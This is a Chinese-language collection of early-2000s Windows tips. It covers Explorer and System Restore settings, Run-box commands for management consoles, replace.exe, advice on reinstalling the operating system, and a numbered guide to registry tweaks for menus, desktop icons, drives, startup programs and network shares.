    虽然你换成了移动硬盘，但是仍然可以通过在电脑中生成两个以上的硬件配置文件的方法对操作系统进行优化。首先应该右键单击“我的电脑”，在弹出的菜单中选择“属性→硬件”标签，单击“硬件配置文件”，再单击“复制”并输入文件名，就可以生成一个新的硬件配置文件。这样，电脑中就有两个硬件配置文件。重新启动，显示出硬件配置列表，我们就可以按照提示选择相应的配置了。

    系统类

    北京时间的灰烬：我使用资源管理器来查看浏览计算机中的文件时，有时候这个文件夹是使用的列表查看方式，但是当我换到另一个文件夹时文件就变成大图标了，请问有没有办法让文件夹的查看方式都一致呢？

    要统一文件夹的查看方式需要单独进行设置，首先依次打开“我的电脑→查看→文件夹选项”，然后切换到“查看”选项卡，在“高级”的列表中勾选上“文件和文件夹”下的“记忆每一个文件夹的视图设置”，点击“确定”。以后你再打开资源管理器切换文件夹时就不会一会儿列表，一会儿图标了。

    北京赵宗廷：最近我新装了Windows Me，但是过了一段时间后，我发现Windows Me并没有比Windows 98快多少，启动后系统的可用系统资源少，硬盘的空间也在迅速减少，这是怎么回事呢？

    其实有心的朋友可能会注意到C盘的根目录下有一个名为_RESOTRE的目录，这个目录占据了很大的空间，但是又没有办法直接删除。这是因为Windows Me在系统内部执行了“还原系统”的功能。

    这个功能的作用是备份系统的重要系统文件和配置文件，以便在系统发生故障的时候借此功能恢复系统，我们可以将其关闭：用右键点击“我的电脑”，选择“属性→性能”，再点击“文件系统”里的“疑难解答”，将“禁用系统还原”打勾，就可关闭Windows Me的还原系统功能了。至于_RESOTRE目录，可以用启动盘启动，然后用DOS命令删除。

    本周分析家小提示

    你是不是经常会遇到这样的情况，想知道某个文件的完整路径，可是使用“查找”功能搜了半天没有找对，或是好不容易查找到了还得手工输入长长的路径。不用烦恼，今天分析家介绍一种快速查看文件路径的方法。首先打开“资源管理器”，然后依次点击“工具→文件夹选项→查看”，勾选“在标题栏中显示完整路径”，再单击“确定”，就会发现资源管理器的网址栏出现了你所选中文件的完整路径了。


运行菜单中的“快捷方式”

《一键清理系统垃圾》

运行菜单中的“快捷方式”

    2002-01-28　　　　作者：

Windows系列操作系统有一个东西非常好用，这就是“运行”命令。在里面输入相应的命令就可以很快捷的打开特定的软件，如：输入“notepad.exe”就可以打开记事本。这个功能在WinXP里面得到了加强，现在在里面输入下面的红色字体内容就可以很方便的打开特定的管理工具。

Computer management 计算机管理 : compmgmt.msc

Device manager 设备管理器 : devmgmt.msc

Disk management 磁盘管理 : diskmgmt.msc

Disk defrag 磁盘碎片整理程序: dfrg.msc

Event viewer 事件查看器 : eventvwr.msc

Shared folders 共享文件夹 : fsmgmt.msc

Group policies 组策略 : gpedit.msc

Local users and groups 本机用户和组 : lusrmgr.msc

Performance monitor 性能 : perfmon.msc

Local security settings 本地安全设置 : secpol.msc

Services 服务 : services.msc

Resultant set of policies 策略的结果集: rsop.msc


在Win 9X下轻松替换使用着的文件

《一键清理系统垃圾》

在Win 9X下轻松替换使用着的文件

    大家都知道，在Windows 98/Me下，有一个“系统文件查看器”，使用该工具我们可以轻松地查找出系统里的哪些文件被损坏了，并可以从安装盘中将对应的文件提取出来，替换已经损坏的文件。在Windows XP中，这个工具不见了，其实啊，Windows XP也有能实现这个工具功能的命令，它就是Replace.exe。该命令在Windows安装目录的System32文件夹下，它的主要功能，就是替换文件，与Windows 98/Me中的“系统文件查看器”不一样的是，它能够替换正在使用中的文件！

    例如，我们用Windows Media Player播放一首路径为“g:\temp\source.mp3”的歌曲，然后在命令提示符窗口下键入下列命令：

    replace.exe d:\windows\temp\source.mp3 g:\temp

    这里的“d:\windows\temp\source.mp3”是准备用来替换的另一首MP3歌曲，注意两个文件的文件名必须保持一致，很快我们就会在看到替换成功的提示，接下来Windows Media Player窗口正在播放的歌曲也会自动变为另一首歌曲，呵呵，够神奇的吧？当然，replace命令的最大好处是用来替换系统文件，这样就不需要重新启动到安全模式下了！

    Replace.exe命令的使用参数如下，有兴趣的朋友可以深入研究一下：

    /A——把新文件加入目标目录，注意不能与/S或/U搭配使用。

    /P——替换文件或加入源文件之前提醒用户进行确认。

    /R——替换只读文件以及未受保护的文件。

    /S——替换目标目录中所有子目录中的文件。

    /W——等待用户插入磁盘后再运行。

    /U——只替换或更新比源文件日期早的文件，不能与/A搭配使用。


重装操作系统20条"原则"【必看】

《一键清理系统垃圾》

重装操作系统20条"原则"【必看】

系统是否需重装，三条法则帮你忙

    如果系统出现以下三种情况之一，应该是你考虑重装系统的时候了：

    1)系统运行效率变得低下，垃圾文件充斥硬盘且散乱分布又不便于集中清理和自动清理；

    2)系统频繁出错，而故障又不便于准确定位和轻易解决；

    3)系统不能启动。

    重新安装系统前，最好先列备份单

    在因系统崩溃或出现故障而准备重装系统前，首先应该想到的是备份好自己的数据。这时，一定要静下心来，仔细罗列一下硬盘中需要备份的资料，把它们一项一项地写在一张纸上，然后逐一对照进行备份。如果你的硬盘不能启动了，这时需要考虑用其他启动盘启动系统后，拷贝自己的数据，或将硬盘挂接到其他电脑上进行备份。为了避免出现硬盘数据不能恢复的灾难发生，最好在平时就养成每天备份重要数据的习惯。

    用户文档是珍宝，首当其冲备份好

    在需要备份的数据中，用户文档是首先要考虑备份的数据。如果你是编辑或作者，就需要首先备份自己的稿件；如果你是老师，需要首先备份自己的讲义；如果你是作曲家，则需要首先备份自己的曲目……通常，用户的文档数据是放在“我的文档”文件夹中的。如果用户另外指定了存放的文件夹，则需要备份的是相应的文件夹。

    上网老手变成瞎，只因忘备收藏夹

    经常上网浏览的用户，一般都收藏有个人特色的地址列表。下次需要搜索同类内容时，打开“收藏夹”便可轻松到达目的地。重装系统时，如果忘记备份自己的收藏夹，安装的新系统对你来说几乎只有一个空的收藏夹，以前保留的好地址就会不翼而飞，你将会感到瞎眼一般。虽然你可能会说，我有Google等好的搜索引擎，但本来一步就可到位的工作人为地变得相对复杂多了，何苦呢？所以，重装系统前一定要备份好“收藏夹”。Windows 2000的收藏夹是系统分区下的文件夹，中间的用户名因人而异。

    要保录入高速度，备份输入法词库

    现在，录入汉字无非是采用笔型和拼音两大类输入法。而目前主流的笔型和拼音输入法都带有智能成分，也就是可以自动或半自动地记忆用户形成的个性化词库。个人用户在带有自己特色的词库环境下录入汉字，工作效率会大大提高。如果重装系统时忘记备份输入法用户词库，系统重装完毕后，输入工作中的个性词汇积累工作相当于从零开始。因此，别忘了备份输入法用户词库。用户词库一般在系统的或文件夹下，有的输入法本身就含有自己的词库备份接口，使用很方便。

    邮箱、QQ备份好，八方联系断不了

    电子邮件和QQ等聊天工具是我们现代人主要的联络工具。重装系统时，一定不要忘记备份自己的邮箱地址簿和QQ好友信息。邮件地址和QQ聊天好友的信息都可以用相应软件的导出功能进行备份。为避免系统崩溃后无法进行这些资料的备份，最好在平时就养成定时备份这些数据的习惯，将系统崩溃后这方面的损失降到最小。其实，FoxMail和QQ都是准绿色软件，你只需在平时压缩这两个软件的文件夹并保存起来备用即可。

     驱动程序备份好，下次装机不用找

    装机后的第一感觉应该是屏幕闪得让你眼睛难受，喇叭一点声音也没有。这是没有安装显卡和声卡驱动程序的缘故。如果你的系统中还有其他板卡或外设，还得重新安装其驱动程序。有些用户的这些驱动程序是拷贝在硬盘文件夹中的，没有安装盘。这时，你就需要特别留意，安装系统前一定要把自己的驱动程序备份出来。

    原有目录先别删，请先准备安装盘

    如果原来的系统下的文件还可以用诸如启动盘等进行访问，在决定重新安装操作系统并结束备份工作后，先不要急于删除或格式化你原有的系统，应该静下心来仔细想想原来的系统分区中还没有你需要保留的文件。再三考虑无误后，接下来的事就应该是准备你的安装光盘了。需要注意的是，你需要在系统BIOS中将光驱设置为第一启动盘。

    软件说明或封套，那里备有序列号

    安装序列号可是个关键的东西，如果你不小心丢掉自己的安装序列号，而又采用全新安装，安装过程将无法进行下去。正规的安装光盘的序列号应该在软件说明书或光盘封套的某个位置上。但是，如果你用的是某些软件合集光盘中提供的测试版系统，那么，这些序列号可能是存在于安装目录中的某个说明文本中，比如SN.TXT等文件。所以，首先要将序列号读出并记录下来以备稍后使用。

    系统出错缺文件，覆盖安装试一遍

    如果系统启动时提示你少某些文件，或者某些文件出了问题，这时，你先别急于格式化自己的硬盘，而应该首先尝试进行覆盖安装。覆盖安装的要点是，先进入安全模式或启动到DOS下，然后执行安装光盘上的SETUP.EXE或其他用来启动安装程序的文件。注意在安装过程中要选择将系统文件安装在与原来系统相同的目录中。经过这样的安装，一般的问题大多可以得到修复，更重要的是以前安装的一些应用软件还可以继续使用。

    覆盖安装不奏效，删除安装新一套

    如果按以上所提的覆盖安装方法没有能够解决你的问题，那么你可以在确认备份工作完成后，并且各类驱动程序都已经准备好的情况下，先用启动盘启动系统，而后用formAT命令格式化你的系统分区，随后执行安装盘上的SETUP.EXE或用来安装的可执行文件，进行全新安装就可以了。

    倘若没有驱动盘，另起目录全新安

    如果按以上所提的覆盖安装方法没有能够解决你的问题，而你又没有把握知道自己是否还有需要备份的东西，或者你不想格式化自己的分区，那么，你可以用另起目录的安装法。方法是，用启动盘启动后执行安装文件，把系统安装在与先前系统不同的目录下。这样，原来的驱动程序还在旧的系统目录中。如果你的驱动程序丢失，当系统发现新的硬件时，你可以按系统提示到原来的目录里找到硬件的驱动程序。当所有硬件驱动程序安装完毕后，你就可以放心删掉原来的系统目录了。

    想要体验新震撼，升级安装需替换

    如果你使用的是较低版本的操作系统，而你想体验同一软件公司刚刚推出的新一代操作系统，那么你可以用升级安装的办法实现你的想法。方法是直接在低级操作系统环境下运行高级操作系统的安装文件即可。操作系统一般说来都是向下兼容的，Windows 98下可以升级安装为Windows 2000或Windows XP，Windows 2000下可以升级安装为Windows XP。升级安装后原来的大部分程序还可以继续使用。

    难舍旧情又求新，请君安装多系统

    如果你不愿意丢掉原来的低级操作系统，同时又想体验一下新一代操作系统的魅力，那么，你可以安装双系统。方法是：在低级操作系统(如Windows 98)下，执行高级操作系统安装盘上的安装文件如SETUP.EXE，然后在安装过程中选择安装在新的目录而不是选择升级安装即可。这样，当安装结束并重新启动系统后，便会出现双系统菜单。多系统安装方法也是如此，只是最好遵守先低级、后高级的安装次序，否则会出现许多麻烦。

    硬盘备份安装盘，再装系统更方便

    为了消除安装时经常到处找安装盘的烦恼，我们可以将系统安装盘备份到自己的电脑中。具体方法是：在你的硬盘的数据备份区中创建文件夹如，将系统安装光盘中的所有文件拷贝到该文件夹中。需要重新安装时运行其中的SETUP.EXE或其他安装文件就可以了。

    倘若系统未崩溃，部分恢复安装快

    如果Windows 98系统没有完全崩溃，但有些系统错误通过磁盘扫描或纠错软件又无法修复，这时可以使用Windows 98的部分恢复安装程序。这个安装程序可以在Windows 98光盘的文件夹里找到。方法是：转入DOS状态，进入目录，运行PCRESTOR，安装程序将会启动。这种安装的速度和硬盘安装的速度差不多，它不会造成数据丢失。同时，重新设置硬件时，一般都会自动完成。

    双启菜单故障难，只需2000安装盘

    如果在安装了Windows 2000后又安装了Windows 98，系统双启动菜单丢失了。这时，可用如下办法解决。首先在BIOS中将启动顺序调整为CD-ROM引导优先，然后将Windows 2000安装盘放入光驱。等自动加载完安装程序后，系统会问你是重新安装还是修复，不用管它，直接退出。最后到CMOS中把启动顺序再改为硬盘启动优先，这样再次开机后就会出现选择菜单了。

    不用2000系统盘，照样修复双启单

    假如Windows 98安装在C盘，Windows 2000安装在D盘，E盘是用户数据区。我们可以事先将启动分区根目录下的BOOT.INI、NTLDR、NTDETECT.COM、BOOTSECT.DOS、IO.SYS、MSDOS.SYS、BOOTFONT.BIN等七个文件备份到我们的E分区。在我们重新安装系统不当而使双启动系统菜单发生混乱时，可以将这七个文件拷贝到启动分区下覆盖一下，就可解决问题了。

    克隆备份好手段，系统工具一并攒

    也许你会觉得每次重装系统最麻烦的不是重装系统本身，而是寻找和安装各类应用软件和实用小工具。这时，一个非常经典的软件Norton Ghost可以解决你的问题。当你安装完系统和一些工具软件后，只要用Ghost软件的备份分区功能将刚才装好的系统连同工具打包成一个文件。当需要恢复时，先用启动盘启动DOS，然后用Ghost把这个文件包快速恢复到原来的分区中即可。网吧安装多台相同的电脑多用此法，电脑老手们也惯用此法。

    软件是否需重装，亲手一试定雌黄

    在另起目录安装系统，而没有删除原来的文件夹下的应用程序的情况下，哪些程序不需要重新安装就可直接使用？这个问题其实只需要动手一试便知。在重新安装系统后，运行一下原来程序目录下的可执行文件，不出现错误提示的一般不需要重装，你就可以把它当成一个绿色软件看待，下次也不用重装。不能运行的或提示缺少文件的肯定是要重装的，这些就不能被列为绿色软件了。


注册表修改指南（一）

《一键清理系统垃圾》

注册表修改指南（一）

p>1 提高子菜单速度
位 置：HKEY_CURRENT_USER\Control Panel\Desktop
键值名：Menushowdelay
    双击键值Menushowdelay后，弹出该键值的编辑窗口，在文本输入框内输入“0”后，再单击“确定”按钮即可。注意在系统默认的菜单弹出效果下，不易感觉到菜单弹出速度的提高；这时，请在桌面上单击“属性”命令，弹出“显示 属性”窗口，然后在“效果”标签下将“动画显示菜单和工具提示”下的“淡入淡出效果”改为“滚动效果”。

2 去掉“关闭系统”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoClose
取 值：1为隐藏、0为显示

3 自动刷新窗口内容
位 置：HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update
键值名：UpdateMode
取 值：0、1
若“UpdateMode”键值为0，则设置为自动刷新，
若“UpdateMode”键值为1，则设置为手工刷新；
这等于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。

4 去掉“设置”
一 位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoSetFolders
取 值：1为隐藏、0为显示
二 位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoSetTaskbar
取 值：1为隐藏、0为显示

5 去掉升级
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoCommonGroups
取 值：1为隐藏、0为显示

6 去掉“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRecentDocsMenu
取 值：1为隐藏、0为显示

7 自动清除“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：ClearRecentDocsOnExit
取 值：1为自动清除、0为不自动清除

8 去掉“查找”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoFind
取 值：1为隐藏、0为显示

9 锁定“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRecentDocsHistory
取 值：1为锁定、0为不锁定

10 去掉“运行”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRun
取 值：1为隐藏、0为显示

注册表修改指南（二）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p>11 搜索“自启动”程序
位 置：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
在注册表内，我们可以查询系统启动后加载了哪些程序。单击注册表内的目录树，这里最重要的是“装载源”，从“软件环境”、“启动程序”显示的结果看，绝大多数“自启动”程序都是通过注册表加载的，即“装载源”显示为“Registry （Machine Run）”的程序。

12 去掉“注销”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoLogOff
取 值：1为隐藏、0为显示

13 缩短“新建”选项
当你用鼠标右键点击资源管理器空白处，并选取新建菜单时，会弹出建立多种程序文件的菜单，但是里面有一些你可能并不常用，比如现在我要去除掉菜单中的“Wave Sound”项目，来缩短菜单。 打开注册表，请选择查看下的搜索项，然后输入“shellnew”，并选择“全字匹配”选项；在HKEY_LOCAL_MACHINE与HKEY_LOCAL_ROOT下进行查找，找到后将该其下面的shellnew子键删除掉即可。

14 清除配色方案
位 置：HKEY_CURRENT_USER\Control Panel\Appearance\Schemes
首先请找到该子键，在窗口的右边会出现系统自带的各种配色方案，将你认为无用的配色方案删除掉，一般只保留“Windows默认”一项。 然后再打开“控制面板”窗口中的“显示”，然后在“显示 属性”窗口中单击“外观”标签，在“窗口配色方案”下拉列表中进行查看。

15 修改桌面图标
例如，我们修改Windows桌面上“回收站”的名字及图标，可执行如下操作步骤。
位 置：HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
    先打开注册表编辑器；然后根据上面提供的位置找到该主键，双击窗口右边的“回收站”，弹出字符串编辑器， 然后在文本输入框内，将“回收站”改为“垃圾筒”， 重新启动机器后，桌面上的回收站就变成了垃圾筒，但图标依旧！单击{645FF040-5081-101B-9F08-00AA002F954E}前面的“+”，则展开这个主键，在它下面还有一个子键DefaultIcon。然后单击此子键，在右窗格中的“数据”栏下将出现三个图标文件名，分别为“$#@60;未命名$ 2;”、“Full”（满）、“Empty”（空）的回收站图标，这三个图标包含在动态链接库Shell32.dll文件里面，图标资源所在的序号分别是31、31、32， 其数据格式是“C:\Windows\System\Shell32.dll,31”等（调用动态链接库中的图标资源，采用这种格式就可以啦！）。如果您想把它改成自己的图标，则只要将此数据改为自己图标或者动态链接库即可，例如使用图标文件为“C:\Windows\help.ico”，这样再重新启动机器就可以看到垃圾筒的图标被改变了。利用同样的方法可以修改桌面上其它的图标和文字。

16 删除“系统”
    当你想删除桌面上的“回收站”、“Internet Explorer”等图标时，会发现它们不能用一般的方法删除。这时还可以通过修改注册表来办到。
位 置：HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace在该分支下面有多个子键，这些子键将对应桌面上的“系统”图标，在窗口右边你就可以看到。删除不需要的图标，即对应的键值；重新启动后，会看到桌面上的一些图标不见啦！

17 隐藏桌面
位 置：HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion \Policies\Explorer
键值名：NoDesktop
取 值：0、1
    这种隐藏桌面图标的方法与简单地在“显示 属性”窗口内，使用“Active desktop”下的隐藏图标的方法不一样。这里的隐藏除了将图标隐藏外，连整个桌面都一并隐藏了起来，并且同时禁止了在桌面上点击鼠标右键功能。

18 去掉“网上邻居”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoNetHood
取 值：1为隐藏、0为显示

19 关闭系统版本号
位 置：HKEY_CURRENT_USER\Control Panel\desktop
键值名：PaintDesktopVersion
取 值：0为隐藏、1为显示
说 明：它能把你的Windows的版本号在桌面的右下角显示出来，如果你使用的是测试版， 那么就可以将桌面右下角的文字去掉。

20 隐藏指定驱动器
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoDrives
取 值：需要说明一下，在这里使用的是2的N次方来代表一个驱动器名称，而非寻常的A、B、C、D……，下面就给出各驱动器名与2的N次方的对应关系，以方便读者：A: 1, B: 2,C: 4, D: 8, E: 16, F: 32, G: 64,H: 128, I: 256,J: 512,K: 1024, L: 2048, M: 4096, N: 8192,O: 16384, P: 32768, Q:65536,R: 131072,S: 262144,T: 524288, U: 1048576, V: 2097152, W:4194304,X: 8388608, Y: 16777216, Z: 33554432按照上面的取值规则，如果你要隐藏A、B、C三个驱动器，输入7即可，因为7=1+2+4，如果你要隐藏所有驱动器，输入67108863。

注册表修改指南（三）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p>21 修改“回收站”
位 置：HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
键值名：Attributes
取 值：40 01 00 20、70 01 00 20
说 明：缺省情况下是40 01 00 20，把它改为70 01 00 20后，就可以把桌面上的“回收站”象资源管理器内的文件一样，能任意地更名或者删除了。

22 修改桌面
位 置：HKEY_CURRENT_USER\ControlPanel\desktop
说 明：打开注册表编辑器，然后打开该分支。在此分支右窗格内可以看到一些项目，现介绍几个如下：HungAppTimeout：这是指一个应用程序出错时试图等待响应的时间，值为毫秒，缺省值为5000毫秒(即5秒)，可以减少为3000毫秒，以加快系统的响应能力。MenuShowDelay：这是指“开始”菜单中当鼠标指向一个具有下级 菜单的菜单项时等待出现下级菜单的延迟时间，单位也是毫秒，可以设成100，即等待0.1秒就会出现（前面已经提到过）。ScreenSaveActive：这是现在屏幕保护功能是否可用，值为0或1，0即为不用屏幕保护功能，1为可用，但必须你已经使用了屏幕保护功能。ScreenSaveTimeOut：这是指屏幕保护的延时，值类型为一个数值。单位是秒，最小值是60秒，但必须你已经使用了屏幕保护功能；如果你将数值改为1，那么每停顿1秒钟，便会启动屏幕保护。WaitToKillAppTimeout：这是指当按下 Crtl+Alt+Del后以后，出现“关闭程序”对话框，出现提示“结束任务”、“等待”时选择“等待”的等待时间，单位是毫秒，默认值是10000。可以减少等待时间。

23 定制按钮颜色
    尽管Windows在外观中可以定义多种窗口显示方案,但要定义某一个部位的颜色，如将黑色的按钮字体改变为其它的颜色， 它就无能为力啦！通过修改注册表能很容易实现。 在注册表内找到HKEY_CURRENT_USER\Control Panel\Colors的子键，然后将窗口右边的“Bottontext”键值由原来的“0 0 0”改为“255 0 0”（代表红色）。

24 汉字后加空格
位 置：HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion
键值名：插空格
取 值：0不插入空格、1插入空格

25 活用Enter键
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer n键值名：
取 值：0保留原功能，输入法不处理、1等同于Esc键，用于清除当前外码输入状态说 明：当取值为1时，如果有候选窗口，会自动隐藏输入窗口，清除所有外码，但不隐藏外码输入窗口。当无候选窗口，清除外码，并隐藏外码输入窗口。

26 活用Space键
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion键值名：
取 值：0指明这是作为结束外码输入的标志键，这种设置适合于形码、1指明这是作为候选选择键，这种设置适合于音码。

27 系统时间格式
位 置：HKEY_CURRENT_USER\ControlPanel\International键值名：sTimeFormat
取 值：H:mm:ss、HHmm不等
说 明：在通常情况下，Windows在任务栏中使用“23:12”的时间格式来显示时间， 但是您可以通过修改注册表编辑器来更改此时间格式。

28 更改登录背景
位 置：HKEY_USERS\.DEFAULT\Control Panel\Desktop
键值名：Wallpaper
取 值：目标背景图文件路径

29 修改注册码
位 置：HKEY_LOCALMACHINE\Software\Microsoft\Windows\CurrentVersion
键值名：ProductId
取 值：任意字符

30 禁止自动运行
    在通常情况下，绝大多数在Windows启动时自动运行的应用程序有如下两种设置办法：在“启动”程序组中添加快捷方式 如果使用的是这种方法。则我们只需将它们的快捷方式从 “启动”程序组中删除即可达到禁止它们自动运行的目的。修改Windows的注册表数据库如果您使用过一些诸如CD播放机等的用户都知道，在使用这些软件时，都将在任务栏右边 将出现一个图标，这有时会带来不便。其实，这些软件的自启动程序的注册项放在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run分支中。您只要到此分支中找出对应的自启动程序即可，另外，在“Run”主键下还可能有“SysExplr”子键。如果有该子键，可以将其中的内容清空，同样也能取消Windows启动时自启动的程序。那么反过来，我们怎样在注册表内添加自启动程序呢？先找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run主键，然后在它的窗口右边建立一 个名为“SysExplorer”的键值名，并将其值设为“Explorer.exe”，退出注册表编辑器，注销用户后重新启动计算机，系统将自动运行资源管理器。 另外Windows还提供了一次性的自启动功能。紧跟在“Run”主键后面有一个“RunOnce”和“RunOnceEx”子键，你可以在这两个子键内设置新的键值，让系统自动运行一次某个程序，即仅在下一次启动Windows时才有效。

注册表修改指南（四）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p> 31 软件显示乱码
     解决的方法是在注册表内找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\fontassoc\Associated CharSet位置，将窗口右边内的“SYMBOL(02)” 键值（这是系统的机内码）改为“NO”即可。

32 删除软件的残骸
    每一个Windows操作系统的的使用者可能都有这样的经历，由于种种原因直接在硬盘中删除了某个文件夹，或者是在“添加／删除程序”里面对一些软件进行反安装。但是有些程序却还有注册信息留在注册表内，当你再次从“添加/删除程序”中卸载该程序时，老是提示“试图删除XXXXXX时出错，放弃卸载”，从而导致了卸载程序错误。当机器中安装大量的软件后随着时间的后移，就在系统的注册表中就形成了垃圾，影响了机器的运行速度。下面介绍彻底清除这些垃圾的方法。用注册表编辑器来清除注册表中关于卸载应用程序的相关键值数据HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall位置，一般的软件在注册表内的反安装子键里有“DisplayName”、“UninstallString”这两个键值，第一个显示的是软件的名称、第二个 显示的是反安装的一些信息。双击第二个键值后，便会明白反安装是怎么回事，反安装实际上是你所安装的软件自带有一个反安装程序，在安装该软件时，它会自己记录一些安装信息存放Install.log文件中，卸载时用这个反安装程序再带上.log文件的参数即可。另外，有些软件反安装时使用的是系统提供的反安装程序。再如，许多应用软件在卸载之后仍会在注册表文件内留下一些无用信息。比较集中的地方在HKEY_LOCAL_MACHINE\Software、HKEY_CURRENT_USER\Software和HKEY_USERS\.Default \Software。这几项里面的内容基本上一致，在其中一处作查找删除就行了。比较常用到的方法是进入HKEY_LOCAL_MACHINE\Software分支中，然后重点查找那些已经确信被安全卸载了的软件的残留信息，在确认无误后删除。

33 恢复CD Key
    如果你不小心将Windows的CDKey丢失了，担心在以后需要安装系统时会遇到什么麻烦。我该如何才能找回它呢？您可以从NT的注册表中找到这个CDKey。打开注册表，然后再找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microso WindowsNT\CurrentVersion”位置，在右侧的ProductId键值中，就包含了CDKey的信息，另外，如果您所使用的NT是OEM版本，则有可能整个ProductId的串值就是CDKey！

34 加入登录信息
    因为加入这样的功能需要修改NT的注册表，所以请您小心并做好备份。首先在注册表中的找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon子键，然后在窗口右边找到“LegalNoticeCaption”和“LegalNoticeText”两个键值。如果没有， 请添加这两个键值。然后在这两个键值内分别输入“这是我的服务器”、“欢迎光临！”。关闭注册表，重启机器，这次您就看到在登录窗口之前，将会出现一个新的窗口，包含上面您所输入的这两条信息。

35 防范非法入侵
    介绍如何防止本地用户非法入侵 Windows NT 系统的文章已经并不少见，但如何防范远程用户呢？当然，一般的做法是，可以在用户拨号进入系统（或通过局域网进入系统）时限制其对文件的访问权限，以达到保护文件的目的。但毕竟这种安全级别不够高，如何能将这些用户锁在系统的门外，以达到绝对安全的目的呢？NT为驱动器和系统目录创建默认共享的目的，是为了使系统管理员、备份程序和其他授权用户及服务性工作能顺利访问其他个人用户的文件。当其他用户访问您的系统时这些共享对象并不显现出来。但是任何一个远程 用户只要知道这些共享对象的确切名称，并且有访问权的话，他就可以与这些共享对象建立连接。令人遗憾的是，NT系统的安全机制非常脆弱。虽然SecurityPack5的出台为老用户提高到管理员水平而提供了一些补漏措施，并且还 有一些NT的安全检查方法，但仍然还会有其他漏洞存在。所以如果您的计算机在局域网上，或者是通过Modem连接 上网的，那么可通过取消这些组件的共享来保护数据。 为了达到此目的，打开NT的注册表编辑器。在注册表编辑 器中，将当前目录定位在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\lanmanagerserver\parameters，如果没有AutoShareWks键值名，那么请你新建立一个；然后再双击它并输入“3D0”，最后单 “确定”按钮、关闭注册表编辑器，然后重新启动计算机。

36 ICQ中有“漏洞”
    ICQ是由以色列一家叫Mirabilis的公司出品的网络软件，其作用是为Internet上的用户提供实时的信息传递服务。有了它，你就可以同千里之外的朋友交流信息，还可以在对方不在线的情况下“呼叫” 他（她）上线，难怪广大网友都亲切地叫它“网络寻呼机”。但是，你是否知道在ICQ for Windows版本中 有一个“漏洞”。ICQ在Windows注册表中有一个键值被称为“Auto Update”（自动更新）。如果该键值被设 置成“Yes”，那么每一次登录到服务器的时候，就会将你的计算机中一些重要信息发送到登录的服务器上。 这些信息包括：你正在使用的操作系统类型、版本、序列号、用户登记名称、公司名称、所使用的浏览器版本等等。这些重要信息的发送可能会被黑客或某些别有心的人所利用，给你带来不必要的麻烦。为了避免此问题的发生可采用修改注册表关掉ICQ的“自动更新”功能。首先在注册表内找到 HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs位置，并在窗口右边找到“Auto Update”键值； 将“Auto Update”键值由“Yes”修改为“No”即可。为了你系统的稳定性，在进行修改时请注意要在关闭ICQ 应用程序的情况下进行修改。修改完毕后，请重新启动计算机。

37 增加执行文件路径
    如果需要运行的程序不在指定的目录中，则DOS系统一般采用在自动批处理文件中设置路径的方法来达到自动寻找此程序的目的；在Windows中则可以更秘密地增加程序路径，而不是通过设置自动批处理的方式，这就需要通过修改注册表来实现上述目的。 比如要为“C:\ProgramFiles\pdoc\pdoc.exe”文件增加路径。先打开注册表，然后找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths的位置，在窗口右边新建一个名为“pdoc.exe”的主键，选择该主键，将其默认值设为“C:\ProgramFiles\pdoc\pdoc.exe”；再新建名为“Path”的主键，将其设为“C:\ProgramFiles\pdoc”。这样就可以通过在“运行”命令行中键入“pdoc.exe” 或“pdoc”来运行该程序了。另外你还可以为已经存在的程序设置新的主键，比如可以为MicrosoftWord 97添加名称为“Word.exe”的主键。假设Word 97安装在“C:\ProgramFiles\MicrosoftOffice\Office\”目录中，则其操作为：打开注册表，在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths”，新建名称为“Word.exe”主键，选择该主键，将其默认值设为“C:\ProgramFiles\MicrosoftOffice\Office\Winword.exe”即可，建立执行目录的方法与上例一样。

